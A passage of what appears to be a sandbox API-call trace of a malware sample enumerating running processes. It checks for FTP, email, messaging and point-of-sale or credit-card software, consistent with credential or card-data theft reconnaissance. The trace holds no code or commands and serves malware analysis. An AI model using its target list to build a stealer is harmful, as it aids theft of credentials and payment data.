EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.210] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xb00000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="eyed.exe") returned 0x8 [0094.210] CloseHandle (hObject=0x5b8) returned 1 [0094.211] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x71c) returned 0x5b8 [0094.211] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.212] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x110000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="tracks.exe") returned 0xa [0094.212] CloseHandle (hObject=0x5b8) returned 1 [0094.213] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x434) returned 0x5b8 [0094.213] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.214] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xc60000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="influences.exe") returned 0xe [0094.214] CloseHandle (hObject=0x5b8) returned 1 [0094.214] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7a8) returned 0x5b8 [0094.214] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.216] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x1150000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="sheets-soccer.exe") returned 0x11 [0094.216] CloseHandle (hObject=0x5b8) returned 1 [0094.216] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x564) returned 0x5b8 [0094.216] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.218] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xd00000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="trademark.exe") returned 0xd [0094.218] CloseHandle (hObject=0x5b8) returned 1 [0094.218] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x560) returned 0x5b8 [0094.218] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.220] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xc10000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="hypothesis_pvc_gravity.exe") returned 0x1a [0094.220] CloseHandle (hObject=0x5b8) returned 1 [0094.220] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x23c) returned 0x5b8 [0094.220] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.222] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x380000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="beginner_capacity_birds.exe") returned 0x1b [0094.222] CloseHandle (hObject=0x5b8) returned 1 [0094.222] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2a8) returned 0x5b8 [0094.222] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.223] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x12b0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="tissuesatininf.exe") returned 0x12 [0094.224] CloseHandle (hObject=0x5b8) returned 1 [0094.224] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7bc) returned 0x5b8 [0094.224] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.225] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xc80000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="algorithms-downloading.exe") returned 0x1a [0094.226] CloseHandle (hObject=0x5b8) returned 1 [0094.226] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5dc) returned 0x5b8 [0094.226] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.227] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x3c0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="dakota.exe") returned 0xa [0094.227] CloseHandle (hObject=0x5b8) returned 1 [0094.227] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7a4) returned 0x5b8 [0094.227] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.229] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xbc0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="gramstruth.exe") returned 0xe [0094.229] CloseHandle (hObject=0x5b8) returned 1 [0094.229] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7e8) returned 0x5b8 [0094.229] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.231] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x3e0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="true.exe") returned 0x8 [0094.231] CloseHandle (hObject=0x5b8) returned 1 [0094.231] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3d4) returned 0x5b8 [0094.231] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.233] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x3e0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="sharingaccredited.exe") returned 0x15 [0094.233] CloseHandle (hObject=0x5b8) returned 1 [0094.233] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7f4) returned 0x5b8 [0094.233] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.235] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x12d0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="3dftp.exe") returned 0x9 [0094.236] CloseHandle (hObject=0x5b8) returned 1 [0094.236] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x544) returned 0x5b8 [0094.236] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.237] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xe60000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="absolutetelnet.exe") returned 0x12 [0094.237] CloseHandle (hObject=0x5b8) returned 1 [0094.237] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x36c) returned 0x5b8 [0094.238] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.239] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x1280000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="alftp.exe") returned 0x9 [0094.239] CloseHandle (hObject=0x5b8) returned 1 [0094.239] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x634) returned 0x5b8 [0094.239] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.241] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x10f0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="barca.exe") returned 0x9 [0094.241] CloseHandle (hObject=0x5b8) returned 1 [0094.241] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x704) returned 0x5b8 [0094.241] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.243] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x11b0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="bitkinex.exe") returned 0xc [0094.243] CloseHandle (hObject=0x5b8) returned 1 [0094.243] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x694) returned 0x5b8 [0094.243] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.244] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xb50000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="coreftp.exe") returned 0xb [0094.245] CloseHandle (hObject=0x5b8) returned 1 [0094.245] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x754) returned 0x5b8 [0094.245] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.246] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xcb0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="far.exe") returned 0x7 [0094.247] CloseHandle (hObject=0x5b8) returned 1 [0094.247] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6a8) returned 0x5b8 [0094.247] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.248] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x1170000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="filezilla.exe") returned 0xd [0094.248] CloseHandle (hObject=0x5b8) returned 1 [0094.248] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x54c) returned 0x5b8 [0094.248] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.250] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x10f0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="flashfxp.exe") returned 0xc [0094.250] CloseHandle (hObject=0x5b8) returned 1 [0094.250] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6f4) returned 0x5b8 [0094.250] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.251] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xe70000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="fling.exe") returned 0x9 [0094.252] CloseHandle (hObject=0x5b8) returned 1 [0094.252] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x290) returned 0x5b8 [0094.252] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.253] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xef0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="foxmailincmail.exe") returned 0x12 [0094.254] CloseHandle (hObject=0x5b8) returned 1 [0094.254] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x10c) returned 0x5b8 [0094.254] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.255] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x1320000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="gmailnotifierpro.exe") returned 0x14 [0094.255] CloseHandle (hObject=0x5b8) returned 1 [0094.255] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7c0) returned 0x5b8 [0094.255] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.256] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xa70000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="icq.exe") returned 0x7 [0094.257] CloseHandle (hObject=0x5b8) returned 1 [0094.257] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x51c) returned 0x5b8 [0094.257] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.258] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x1c0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="leechftp.exe") returned 0xc [0094.258] CloseHandle (hObject=0x5b8) returned 1 [0094.258] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7d0) returned 0x5b8 [0094.258] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.260] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x1230000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="ncftp.exe") returned 0x9 [0094.260] CloseHandle (hObject=0x5b8) returned 1 [0094.260] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6c0) returned 0x5b8 [0094.260] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.261] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xfd0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="notepad.exe") returned 0xb [0094.261] CloseHandle (hObject=0x5b8) returned 1 [0094.261] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x31c) returned 0x5b8 [0094.261] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.263] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xc0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="operamail.exe") returned 0xd [0094.263] CloseHandle (hObject=0x5b8) returned 1 [0094.263] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x25c) returned 0x5b8 [0094.263] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.264] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x8c0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="outlook.exe") returned 0xb [0094.264] CloseHandle (hObject=0x5b8) returned 1 [0094.264] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5c4) returned 0x5b8 [0094.264] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.266] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xbd0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="pidgin.exe") returned 0xa [0094.266] CloseHandle (hObject=0x5b8) returned 1 [0094.266] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x80c) returned 0x5b8 [0094.266] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.267] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xb00000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="scriptftp.exe") returned 0xd [0094.267] CloseHandle (hObject=0x5b8) returned 1 [0094.267] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x81c) returned 0x5b8 [0094.268] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.269] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x1280000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="skype.exe") returned 0x9 [0094.269] CloseHandle (hObject=0x5b8) returned 1 [0094.269] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x82c) returned 0x5b8 [0094.269] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.270] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x1160000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="smartftp.exe") returned 0xc [0094.271] CloseHandle (hObject=0x5b8) returned 1 [0094.271] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x83c) returned 0x5b8 [0094.271] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.272] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x330000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="thunderbird.exe") returned 0xf [0094.273] CloseHandle (hObject=0x5b8) returned 1 [0094.273] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x84c) returned 0x5b8 [0094.273] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.274] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x10f0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="totalcmd.exe") returned 0xc [0094.275] CloseHandle (hObject=0x5b8) returned 1 [0094.275] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x85c) returned 0x5b8 [0094.275] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.276] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x1220000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="trillian.exe") returned 0xc [0094.276] CloseHandle (hObject=0x5b8) returned 1 [0094.276] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x86c) returned 0x5b8 [0094.276] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.278] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x310000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="webdrive.exe") returned 0xc [0094.278] CloseHandle (hObject=0x5b8) returned 1 [0094.278] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x87c) returned 0x5b8 [0094.278] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.280] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x170000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="whatsapp.exe") returned 0xc [0094.280] CloseHandle (hObject=0x5b8) returned 1 [0094.280] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x88c) returned 0x5b8 [0094.280] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.282] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x11a0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="winscp.exe") returned 0xa [0094.282] CloseHandle (hObject=0x5b8) returned 1 [0094.282] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x89c) returned 0x5b8 [0094.282] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.283] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xfc0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="yahoomessenger.exe") returned 0x12 [0094.284] CloseHandle (hObject=0x5b8) returned 1 [0094.284] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8ac) returned 0x5b8 [0094.284] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.285] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x820000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="active-charge.exe") returned 0x11 [0094.285] CloseHandle (hObject=0x5b8) returned 1 [0094.285] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8bc) returned 0x5b8 [0094.286] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.287] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x13b0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="accupos.exe") returned 0xb [0094.287] CloseHandle (hObject=0x5b8) returned 1 [0094.287] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8cc) returned 0x5b8 [0094.287] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.288] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x190000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="afr38.exe") returned 0x9 [0094.289] CloseHandle (hObject=0x5b8) returned 1 [0094.289] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8dc) returned 0x5b8 [0094.289] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.290] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x320000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="aldelo.exe") returned 0xa [0094.290] CloseHandle (hObject=0x5b8) returned 1 [0094.291] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8ec) returned 0x5b8 [0094.291] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.292] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xd40000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="ccv_server.exe") returned 0xe [0094.292] CloseHandle (hObject=0x5b8) returned 1 [0094.292] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8fc) returned 0x5b8 [0094.292] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.294] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x880000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="centralcreditcard.exe") returned 0x15 [0094.294] CloseHandle (hObject=0x5b8) returned 1 [0094.294] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x90c) returned 0x5b8 [0094.294] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.296] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x3a0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="creditservice.exe") returned 0x11 [0094.296] CloseHandle (hObject=0x5b8) returned 1 [0094.296] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x91c) returned 0x5b8 [0094.296] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.298] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x11e0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="edcsvr.exe") returned 0xa [0094.298] CloseHandle (hObject=0x5b8) returned 1 [0094.298] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x92c) returned 0x5b8 [0094.298] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.299] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xa90000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="fpos.exe") returned 0x8 [0094.300] CloseHandle (hObject=0x5b8) returned 1 [0094.300] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x93c) returned 0x5b8 [0094.300] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.301] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x960000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="isspos.exe") returned 0xa [0094.301] CloseHandle (hObject=0x5b8) returned 1 [0094.301] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x94c) returned 0x5b8 [0094.301] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.302] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x310000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="mxslipstream.exe") returned 0x10 [0094.303] CloseHandle (hObject=0x5b8) returned 1 [0094.303] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x95c) returned 0x5b8 [0094.303] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.304] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xca0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="omnipos.exe") returned 0xb [0094.304] CloseHandle (hObject=0x5b8) returned 1 [0094.304] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x96c) returned 0x5b8 [0094.304] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d2b4, cb=0x4, lpcbNeeded=0x18d298 | out: lphModule=0x18d2b4, lpcbNeeded=0x18d298) returned 1 [0094.305] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x3d0000, lpBaseName=0x18ca98, nSize=0x400 | out: lpBaseName="spcwin.exe") returned 0xa [0094.306] CloseHandle (hObject=0x5b8) returned 1 [0094.306] OpenProcess (dwDesiredAccess=0x410, 